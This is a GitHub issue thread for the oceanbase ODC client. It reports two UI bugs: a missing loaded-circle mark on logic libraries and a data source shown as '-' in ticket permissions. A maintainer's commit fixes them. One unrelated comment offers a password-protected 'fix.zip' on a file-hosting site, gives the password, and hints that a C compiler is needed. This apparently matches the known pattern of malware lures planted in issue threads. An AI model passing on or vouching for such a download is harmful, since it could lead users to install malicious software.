### ISSUE TITLE
[Bug]: Schema optimizations

### ISSUE THREAD

**Issue by qymsummer** [oceanbase/odc#3603]
### ODC version

4.3.2

### OB version

no related 

### What happened?

![image](https://github.com/user-attachments/assets/0f651c05-3b46-4d92-bb80-c9e18696eb11)
Logic libraries, when loaded, should have a circle mark
![image](https://github.com/user-attachments/assets/e8cd59d2-0485-4c94-91d7-611835526c83)
In the ticket permissions, the data source displays-

### What did you expect to happen?

Logic libraries, when loaded, should have a circle mark
In the ticket permissions, the data source displays-

### How can we reproduce it (as minimally and precisely as possible)?

Logic libraries, when loaded, should have a circle mark
In the ticket permissions, the data source displays-

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler

**Comment by HSunboy** [comment]
Fixed In Commit [fc75f558b0aaf21cf50eca18601554a40e30be6a](https://github.com/oceanbase/odc-client/commit/fc75f558b0aaf21cf50eca18601554a40e30be6a)
            ------
            畅晚
            Fri Nov 22 11:04:32 2024 +0800

**Comment by qymsummer** [comment]
![image](https://github.com/user-attachments/assets/3f338624-931b-4b16-8a1e-5e60bcbf598b)

pass

**Comment by qymsummer** [comment]
![image](https://github.com/user-attachments/assets/ea8d9920-ddbb-4a01-862a-4c8b0389889c)
pass
